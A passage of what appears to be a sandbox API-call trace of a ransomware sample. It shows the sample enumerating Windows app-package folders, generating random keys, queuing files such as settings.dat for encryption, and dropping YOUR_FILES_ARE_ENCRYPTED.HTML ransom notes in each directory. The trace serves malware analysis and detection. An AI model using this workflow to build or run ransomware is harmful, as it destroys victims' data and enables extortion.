lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.661] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\Settings") returned 102 [0120.661] GetProcessHeap () returned 0x600000 [0120.661] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0120.661] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\Settings" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\Settings") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\Settings" [0120.661] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\Settings", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\Settings\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\Settings\\*" [0120.662] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\Settings\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbf997b3, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0xbf997b3, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0xc0583b1, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d14c, dwReserved1=0x63d090, cFileName=".", cAlternateFileName="")) returned 0x626638 [0120.662] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbf997b3, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0xbf997b3, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0xc0583b1, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d14c, dwReserved1=0x63d090, cFileName="..", cAlternateFileName="")) returned 1 [0120.662] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc0583b1, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0xc0583b1, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0xc0583b1, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d14c, dwReserved1=0x63d090, cFileName="roaming.lock", cAlternateFileName="ROAMIN~1.LOC")) returned 1 [0120.662] StrStrIW (lpFirst="roaming.lock", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.662] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\Settings\\roaming.lock") returned 115 [0120.662] PathFindExtensionW (pszPath="roaming.lock") returned=".lock" [0120.662] lstrlenW (lpString=".lock") returned 5 [0120.662] PathFindExtensionW (pszPath="roaming.lock") returned=".lock" [0120.662] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbf997b3, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0xbf997b3, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x11d3fb2a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x63d14c, dwReserved1=0x63d090, cFileName="settings.dat", cAlternateFileName="")) returned 1 [0120.662] StrStrIW (lpFirst="settings.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.662] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\Settings\\settings.dat") returned 115 [0120.662] PathFindExtensionW (pszPath="settings.dat") returned=".dat" [0120.662] lstrlenW (lpString=".dat") returned 4 [0120.662] PathFindExtensionW (pszPath="settings.dat") returned=".dat" [0120.662] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0120.662] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\Settings\\settings.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windowssoundrecorder_8wekyb3d8bbwe\\settings\\settings.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x324 [0120.663] GetFileSizeEx (in: hFile=0x324, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=8192) returned 1 [0120.663] GetProcessHeap () returned 0x600000 [0120.663] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x670340 [0120.665] wsprintfW (in: param_1=0x19e0aa, param_2="%02X" | out: param_1="0B") returned 2 [0120.665] wsprintfW (in: param_1=0x19e0ae, param_2="%02X" | out: param_1="6F") returned 2 [0120.665] wsprintfW (in: param_1=0x19e0b2, param_2="%02X" | out: param_1="9F") returned 2 [0120.665] wsprintfW (in: param_1=0x19e0b6, param_2="%02X" | out: param_1="4E") returned 2 [0120.665] wsprintfW (in: param_1=0x19e0ba, param_2="%02X" | out: param_1="8E") returned 2 [0120.665] wsprintfW (in: param_1=0x19e0be, param_2="%02X" | out: param_1="5C") returned 2 [0120.665] wsprintfW (in: param_1=0x19e0c2, param_2="%02X" | out: param_1="8E") returned 2 [0120.665] wsprintfW (in: param_1=0x19e0c6, param_2="%02X" | out: param_1="00") returned 2 [0120.665] wsprintfW (in: param_1=0x19e0ca, param_2="%02X" | out: param_1="EC") returned 2 [0120.665] wsprintfW (in: param_1=0x19e0ce, param_2="%02X" | out: param_1="39") returned 2 [0120.665] wsprintfW (in: param_1=0x19e0d2, param_2="%02X" | out: param_1="A6") returned 2 [0120.665] wsprintfW (in: param_1=0x19e0d6, param_2="%02X" | out: param_1="67") returned 2 [0120.665] wsprintfW (in: param_1=0x19e0da, param_2="%02X" | out: param_1="F3") returned 2 [0120.666] wsprintfW (in: param_1=0x19e0de, param_2="%02X" | out: param_1="8F") returned 2 [0120.666] wsprintfW (in: param_1=0x19e0e2, param_2="%02X" | out: param_1="DA") returned 2 [0120.666] wsprintfW (in: param_1=0x19e0e6, param_2="%02X" | out: param_1="52") returned 2 [0120.666] wsprintfW (in: param_1=0x19e0ea, param_2="%02X" | out: param_1="60") returned 2 [0120.666] wsprintfW (in: param_1=0x19e0ee, param_2="%02X" | out: param_1="9B") returned 2 [0120.666] wsprintfW (in: param_1=0x19e0f2, param_2="%02X" | out: param_1="D6") returned 2 [0120.666] wsprintfW (in: param_1=0x19e0f6, param_2="%02X" | out: param_1="CF") returned 2 [0120.666] wsprintfW (in: param_1=0x19e0fa, param_2="%02X" | out: param_1="70") returned 2 [0120.666] wsprintfW (in: param_1=0x19e0fe, param_2="%02X" | out: param_1="31") returned 2 [0120.666] wsprintfW (in: param_1=0x19e102, param_2="%02X" | out: param_1="8B") returned 2 [0120.666] wsprintfW (in: param_1=0x19e106, param_2="%02X" | out: param_1="54") returned 2 [0120.666] wsprintfW (in: param_1=0x19e10a, param_2="%02X" | out: param_1="17") returned 2 [0120.666] wsprintfW (in: param_1=0x19e10e, param_2="%02X" | out: param_1="FC") returned 2 [0120.666] wsprintfW (in: param_1=0x19e112, param_2="%02X" | out: param_1="C6") returned 2 [0120.666] wsprintfW (in: param_1=0x19e116, param_2="%02X" | out: param_1="25") returned 2 [0120.666] wsprintfW (in: param_1=0x19e11a, param_2="%02X" | out: param_1="37") returned 2 [0120.666] wsprintfW (in: param_1=0x19e11e, param_2="%02X" | out: param_1="6A") returned 2 [0120.666] wsprintfW (in: param_1=0x19e122, param_2="%02X" | out: param_1="CD") returned 2 [0120.666] wsprintfW (in: param_1=0x19e126, param_2="%02X" | out: param_1="37") returned 2 [0120.666] lstrcpyW (in: lpString1=0x6803f4, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\Settings\\settings.dat" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\Settings\\settings.dat") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\Settings\\settings.dat" [0120.666] CreateIoCompletionPort (FileHandle=0x324, ExistingCompletionPort=0x274, CompletionKey=0x670340, NumberOfConcurrentThreads=0x0) returned 0x274 [0120.667] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x670340, lpOverlapped=0x670340) returned 1 [0120.667] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbf997b3, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0xbf997b3, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x11d3fb2a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x63d14c, dwReserved1=0x63d090, cFileName="settings.dat", cAlternateFileName="")) returned 0 [0120.667] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0120.667] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\Settings\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 132 [0120.667] GetProcessHeap () returned 0x600000 [0120.667] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x314d018 [0120.667] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\Settings\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windowssoundrecorder_8wekyb3d8bbwe\\settings\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0120.667] WriteFile (in: hFile=0x320, lpBuffer=0x314d018*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x314d018*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0120.668] CloseHandle (hObject=0x320) returned 1 [0120.668] GetProcessHeap () returned 0x600000 [0120.668] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314d018 | out: hHeap=0x600000) returned 1 [0120.668] GetProcessHeap () returned 0x600000 [0120.668] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0120.668] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbf997b3, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0xbf997b3, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0xbf997b3, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="SystemAppData", cAlternateFileName="SYSTEM~1")) returned 1 [0120.668] StrStrIW (lpFirst="SystemAppData", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.669] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\SystemAppData") returned 107 [0120.669] GetProcessHeap () returned 0x600000 [0120.669] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0120.669] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\SystemAppData" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\SystemAppData") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\SystemAppData" [0120.669] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\SystemAppData", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\SystemAppData\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\SystemAppData\\*" [0120.669] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\SystemAppData\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbf997b3, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0xbf997b3, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0xbf997b3, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d14c, dwReserved1=0x63d090, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0120.669] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbf997b3, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0xbf997b3, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0xbf997b3, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d14c, dwReserved1=0x63d090, cFileName="..", cAlternateFileName="")) returned 1 [0120.669] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbf997b3, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0xbf997b3, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0xbf997b3, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d14c, dwReserved1=0x63d090, cFileName="..", cAlternateFileName="")) returned 0 [0120.669] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0120.669] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\SystemAppData\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 137 [0120.669] GetProcessHeap () returned 0x600000 [0120.669] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x314d018 [0120.669] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\SystemAppData\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windowssoundrecorder_8wekyb3d8bbwe\\systemappdata\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0120.670] WriteFile (in: hFile=0x320, lpBuffer=0x314d018*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x314d018*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0120.671] CloseHandle (hObject=0x320) returned 1 [0120.671] GetProcessHeap () returned 0x600000 [0120.671] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314d018 | out: hHeap=0x600000) returned 1 [0120.671] GetProcessHeap () returned 0x600000 [0120.671] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0120.671] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbf997b3, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0xbf997b3, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0xbf997b3, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 1 [0120.671] StrStrIW (lpFirst="TempState", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.671] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\TempState") returned 103 [0120.671] GetProcessHeap () returned 0x600000 [0120.671] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0120.671] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\TempState" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\TempState") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\TempState" [0120.671] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\TempState", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\TempState\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\TempState\\*" [0120.671] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\TempState\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbf997b3, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0xbf997b3, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0xbf997b3, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d14c, dwReserved1=0x63d090, cFileName=".", cAlternateFileName="")) returned 0x626638 [0120.671] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbf997b3, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0xbf997b3, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0xbf997b3, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d14c, dwReserved1=0x63d090, cFileName="..", cAlternateFileName="")) returned 1 [0120.671] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbf997b3, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0xbf997b3, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0xbf997b3, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d14c, dwReserved1=0x63d090, cFileName="..", cAlternateFileName="")) returned 0 [0120.671] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0120.671] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\TempState\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 133 [0120.671] GetProcessHeap () returned 0x600000 [0120.671] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x314d018 [0120.671] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\TempState\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windowssoundrecorder_8wekyb3d8bbwe\\tempstate\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0120.674] WriteFile (in: hFile=0x320, lpBuffer=0x314d018*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x314d018*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0120.675] CloseHandle (hObject=0x320) returned 1 [0120.675] GetProcessHeap () returned 0x600000 [0120.676] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314d018 | out: hHeap=0x600000) returned 1 [0120.676] GetProcessHeap () returned 0x600000 [0120.676] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0120.676] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbf997b3, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0xbf997b3, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0xbf997b3, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 0 [0120.676] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0120.676] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 123 [0120.676] GetProcessHeap () returned 0x600000 [0120.676] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x314d018 [0120.676] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windowssoundrecorder_8wekyb3d8bbwe\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0120.676] WriteFile (in: hFile=0x214, lpBuffer=0x314d018*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e7a4, lpOverlapped=0x0 | out: lpBuffer=0x314d018*, lpNumberOfBytesWritten=0x19e7a4*=0x3c00, lpOverlapped=0x0) returned 1 [0120.677] CloseHandle (hObject=0x214) returned 1 [0120.677] GetProcessHeap () returned 0x600000 [0120.677] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314d018 | out: hHeap=0x600000) returned 1 [0120.677] GetProcessHeap () returned 0x600000 [0120.677] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f4fc8 | out: hHeap=0x600000) returned 1 [0120.679] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9357b12, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x93f064f, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x9783e1e, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e94c, dwReserved1=0x39f712c, cFileName="Microsoft.WindowsStore_8wekyb3d8bbwe", cAlternateFileName="MICROS~4.WIN")) returned 1 [0120.679] StrStrIW (lpFirst="Microsoft.WindowsStore_8wekyb3d8bbwe", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.679] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe") returned 85 [0120.679] GetProcessHeap () returned 0x600000 [0120.679] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f4fc8 [0120.680] lstrcpyW (in: lpString1=0x30f4fc8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe" [0120.680] lstrcatW (in: 